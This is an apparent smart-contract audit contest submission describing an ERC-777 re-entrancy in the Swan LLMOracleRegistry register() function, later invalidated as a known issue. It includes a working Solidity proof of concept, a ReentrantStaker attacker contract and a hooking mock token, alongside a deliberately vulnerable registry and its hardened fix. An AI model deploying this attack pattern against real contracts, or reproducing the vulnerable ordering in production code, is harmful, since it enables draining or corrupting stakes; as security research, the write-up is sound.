Dria

Swan
NFT, Hardhat
21,000 USDC
Submission Details
Severity: medium
Invalid

Re-entrancy in the `LLMOracleRegistry::register()` function

Summary

The documentation states that the protocol accepts any token compatible with the ERC-20 standard.
ERC-777 tokens are backward compatible with ERC-20, but they invoke the holder's `tokensToSend` hook before the balance is moved. If an attacker calls `register()` with such a token, that hook runs while `register()` is still inside `token.transferFrom`, and the attacker can use it to call `register()` again, re-entering the function before the registration has been recorded.

Vulnerability Details

```solidity
function register(LLMOracleKind kind) public {
    // ... (stake amount lookup and the isRegistered check are elided in this excerpt)
    // interaction: an ERC-777 token calls back into msg.sender's tokensToSend hook here
    token.transferFrom(msg.sender, address(this), amount);
    // register the user: state is written only after the external call returns
    registrations[msg.sender][kind] = amount; // <=
    emit Registered(msg.sender, kind);        // <=
}
```

Impact

Because `registrations[msg.sender][kind]` is written only after `transferFrom` returns, the `isRegistered` check is still evaluated against the old state during the callback, so every re-entrant call passes it and pulls another `amount` of tokens. When the nested calls unwind, the mapping is overwritten with the same `amount` each time, so the attacker ends up registered once for the same `LLMOracleKind` while the registry holds several stakes from them. The registration data no longer matches the contract's token balance, and any accounting built on `registrations` is distorted.

Each re-entrant call is paid for by the attacker's own transaction. If the chain of calls runs out of gas, only that transaction reverts, so the denial-of-service exposure to other users is limited to the accounting inconsistency described above rather than a stuck contract.

Re-entrant calls also emit `Registered` several times for a single registration, which can mislead off-chain systems (indexers, monitoring, payout logic) that rely on these events.
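The sequence described above, written out as an added example (this is not Swan project code; the contract names `RegistryBase`, `VulnerableRegistry`, `HardenedRegistry`, `HookingToken` and `ReentrantStaker`, the fixed `STAKE`, and the simplified token are all assumptions). `HookingToken` is a constructed mock with an ERC-20 `transferFrom` that notifies the holder before moving balances, reproducing the ERC-777 `tokensToSend` ordering; `ReentrantStaker` is the attacker whose hook re-enters `register()`; the two registries show the vulnerable ordering beside the checks-effects-interactions plus lock version recommended below.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not project code. Names and the fixed STAKE are assumptions.

interface IERC20Like {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Holder-side ERC-777 hook (the standard resolves the implementer through ERC-1820).
interface IERC777Sender {
    function tokensToSend(address operator, address from, address to, uint256 amount,
                          bytes calldata userData, bytes calldata operatorData) external;
}

enum LLMOracleKind { Generator, Validator }

abstract contract RegistryBase {
    IERC20Like public immutable token;
    uint256 public constant STAKE = 1 ether;
    mapping(address => mapping(LLMOracleKind => uint256)) public registrations;
    event Registered(address indexed user, LLMOracleKind kind);

    constructor(IERC20Like t) { token = t; }

    function isRegistered(address who, LLMOracleKind kind) public view returns (bool) {
        return registrations[who][kind] != 0;
    }

    function register(LLMOracleKind kind) public virtual;
}

// Ordering from the report: external call first, state write afterwards.
contract VulnerableRegistry is RegistryBase {
    constructor(IERC20Like t) RegistryBase(t) {}

    function register(LLMOracleKind kind) public override {
        require(!isRegistered(msg.sender, kind), "already registered"); // check
        token.transferFrom(msg.sender, address(this), STAKE);            // interaction
        registrations[msg.sender][kind] = STAKE;                         // effect (too late)
        emit Registered(msg.sender, kind);
    }
}

// Checks-effects-interactions plus a reentrancy lock.
contract HardenedRegistry is RegistryBase {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }

    constructor(IERC20Like t) RegistryBase(t) {}

    function register(LLMOracleKind kind) public override nonReentrant {
        require(!isRegistered(msg.sender, kind), "already registered"); // check
        registrations[msg.sender][kind] = STAKE;                         // effect
        emit Registered(msg.sender, kind);
        token.transferFrom(msg.sender, address(this), STAKE);            // interaction last
    }
}

// Constructed mock: ERC-20 surface, ERC-777 style pre-transfer notification of the holder.
contract HookingToken is IERC20Like {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
    function approve(address spender, uint256 amount) external { allowance[msg.sender][spender] = amount; }

    function transferFrom(address from, address to, uint256 amount) external override returns (bool) {
        if (from.code.length > 0) {
            // Hook fires before any balance changes, while the caller's state is still stale.
            IERC777Sender(from).tokensToSend(msg.sender, from, to, amount, "", "");
        }
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// Attacker: re-enters register() MAX_DEPTH times while the first call is mid-transfer.
contract ReentrantStaker is IERC777Sender {
    RegistryBase public immutable registry;
    HookingToken public immutable token;
    uint256 public constant MAX_DEPTH = 3;
    uint256 public depth;

    constructor(RegistryBase r, HookingToken t) { registry = r; token = t; }

    function attack() external {
        token.approve(address(registry), type(uint256).max);
        registry.register(LLMOracleKind.Generator);
    }

    function tokensToSend(address, address from, address, uint256, bytes calldata, bytes calldata)
        external override
    {
        // registrations[this][Generator] is still 0 here, so isRegistered() passes again.
        if (from == address(this) && depth < MAX_DEPTH) {
            depth++;
            registry.register(LLMOracleKind.Generator);
        }
    }
}
```

Deploy `HookingToken`, a `VulnerableRegistry` over it and a `ReentrantStaker` pointed at that registry, mint 4 ether of tokens to the staker and call `attack()`: the registry's balance becomes 4 ether, `registrations[staker][Generator]` is 1 ether, and `Registered` is emitted four times. Point the same staker at a `HardenedRegistry` instead and the nested call reverts on the lock (it would also fail the `already registered` check, since the effect now precedes the interaction), which unwinds the whole `attack()` transaction.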

Tools Used

Manual review, Slither

Recommendations

  1. Apply the `nonReentrant` modifier from OpenZeppelin's `ReentrancyGuard` to `register()` so the function cannot be re-entered from a token hook.

  2. Follow the checks-effects-interactions (CEI) pattern: record the registration and emit the event before calling `token.transferFrom`, so that a re-entrant call observes the updated state.

```diff
function register(LLMOracleKind kind) public {
+ registrations[msg.sender][kind] = amount;
+ emit Registered(msg.sender, kind);
token.transferFrom(msg.sender, address(this), amount);
- registrations[msg.sender][kind] = amount;
- emit Registered(msg.sender, kind);
}
```
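Review bot: moving `+ registrations[msg.sender][kind] = amount;` ahead of `token.transferFrom` only stops the re-entry if `register()` still opens with a check on that mapping (the `isRegistered` check the report refers to), which this hunk does not show; with that check in place a nested call reverts on it, and if `transferFrom` then fails the revert also rolls back the early write and the early `Registered` event, so no phantom registration survives. Keep the `nonReentrant` modifier from recommendation 1 alongside this reorder rather than relying on the ordering alone.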
Updates

Lead Judging Commences

inallhonesty Lead Judge 8 months ago
Submission Judgement Published
Invalidated
Reason: Known issue
